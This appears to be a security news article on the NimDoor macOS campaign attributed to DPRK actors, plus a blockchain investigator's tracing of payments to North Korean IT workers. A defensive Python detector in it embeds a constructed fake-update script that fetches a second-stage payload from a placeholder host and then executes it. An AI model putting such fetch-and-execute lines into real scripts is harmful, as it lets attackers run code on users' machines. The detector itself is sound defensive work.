Beware! North Korean Hackers Target Mac Users in a Very Creative Way
Jul 3, 2025 5:00 PM

SentinelLabs, the research and threat intelligence arm of cybersecurity firm SentinelOne, has analysed a new and sophisticated attack campaign called NimDoor, in which DPRK threat actors target macOS devices.

The elaborate scheme uses malware written in the programming language Nim to deploy multiple attack chains on devices used in small Web3 businesses, a recent trend among these actors.

Self-proclaimed investigator ZachXBT has also uncovered a chain of payments made to North Korean IT workers, which may be connected to this group of hackers.

How The Attack is Executed

The detailed report by SentinelLabs describes a novel and obfuscated approach to breaching Mac devices.

It begins in a now-familiar way: by impersonating a trusted contact to schedule a meeting via Calendly, with the target subsequently receiving an email to update the Zoom application. You can find more information on this particular scam trick in our detailed report here.

The fake update script ends with three lines of malicious code that retrieve and execute a second-stage script from an attacker-controlled server, then open a legitimate Zoom meeting link.

Clicking on the link automatically downloads two Mac binaries, which initiate two independent execution chains: the first scrapes general system information and application-specific data. The second ensures that the attacker will have long-term access to the affected machine.

The attack chain then continues by installing two Bash scripts via a Trojan. One targets data from specific browsers: Arc, Brave, Firefox, Chrome, and Edge. The other steals Telegram’s encrypted data and the blob used to decrypt it. The stolen data is then exfiltrated to the attacker-controlled server.
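An added illustration of one defensive check that follows from the chain described above: scanning a downloaded "update" script for trailing lines that fetch remote content and execute it. This is example code written for this article, not SentinelLabs' tooling or anything from the campaign; the script body, URLs and line threshold are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of a fake "Zoom update" shell script: a benign-looking
# body with fetch-and-execute lines appended at the end. URLs are placeholders.
SAMPLE_SCRIPT = """#!/bin/bash
# Zoom update helper (constructed sample, not real Zoom code)
echo "Checking for updates..."
sleep 1
echo "Update complete."
curl -fsSL https://updates.example.invalid/stage2.sh -o /tmp/.u
chmod +x /tmp/.u && /tmp/.u
open "https://zoom.us/j/0000000000"
"""

# Indicators: a remote fetch tool, and something that makes content executable
# or pipes it into a shell.
FETCH = re.compile(r"\b(curl|wget)\b")
EXEC = re.compile(r"\|\s*(ba|z)?sh\b|\bchmod\s+\+x\b|\b(ba|z)?sh\s+-c\b|\beval\b")
URL = re.compile(r"https?://[^\s'\"]+")


def code_lines(script: str) -> List[Tuple[int, str]]:
    """Return (line_no, text) for non-empty, non-comment lines."""
    out = []
    for n, raw in enumerate(script.splitlines(), 1):
        s = raw.strip()
        if s and not s.startswith("#"):
            out.append((n, s))
    return out


def tail_findings(script: str, tail: int = 5) -> List[Dict]:
    """Scan only the last `tail` code lines, where appended payloads tend to sit."""
    findings = []
    for n, s in code_lines(script)[-tail:]:
        fetch, execute = bool(FETCH.search(s)), bool(EXEC.search(s))
        if fetch or execute:
            findings.append({"line": n, "text": s, "fetch": fetch,
                             "exec": execute, "urls": URL.findall(s)})
    return findings


def is_suspicious(script: str, tail: int = 5) -> bool:
    """True when the trailing lines both fetch remote content and execute something."""
    f = tail_findings(script, tail)
    return any(x["fetch"] for x in f) and any(x["exec"] for x in f)


if __name__ == "__main__":
    for finding in tail_findings(SAMPLE_SCRIPT):
        print(finding)
    print("suspicious:", is_suspicious(SAMPLE_SCRIPT))
```

The check is a heuristic for triage, not a verdict: legitimate installers also use curl, so the flagged lines and URLs should be reviewed against the vendor's real download hosts.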

What makes this approach unusual, and challenging for security analysts, is the combination of multiple malware components with varied injection and spoofing techniques, which makes it very difficult to detect.

Similar attacks have also been detected by Huntabil.IT in April and Huntress in June.

Follow The Money

ZachXBT, the pseudonymous blockchain investigator, recently posted on X his latest findings about substantial payments made to various Democratic People's Republic of Korea (DPRK) developers working on diverse projects since the beginning of the year.

He has managed to identify eight separate workers working for 12 different companies.

His findings indicate that $2.76 million in USDC per month was sent out from Circle accounts to addresses associated with the developers. These addresses are closely connected to one that was blacklisted by Tether in 2023, as it’s tied to alleged conspirator Sim Hyon Sop.

Zach continues to monitor similar clusters of addresses, but has not made any information public, as they are still active.

He has issued a warning stating that once these workers take ownership of contracts, the underlying project is at high risk.

“I believe that when a team hires multiple DPRK ITWs (IT workers), it is a decent indicator for determining that the startup will be a failure. Unlike other threats to the industry, these workers have little sophistication, so it’s mainly the result of a team’s own negligence.”
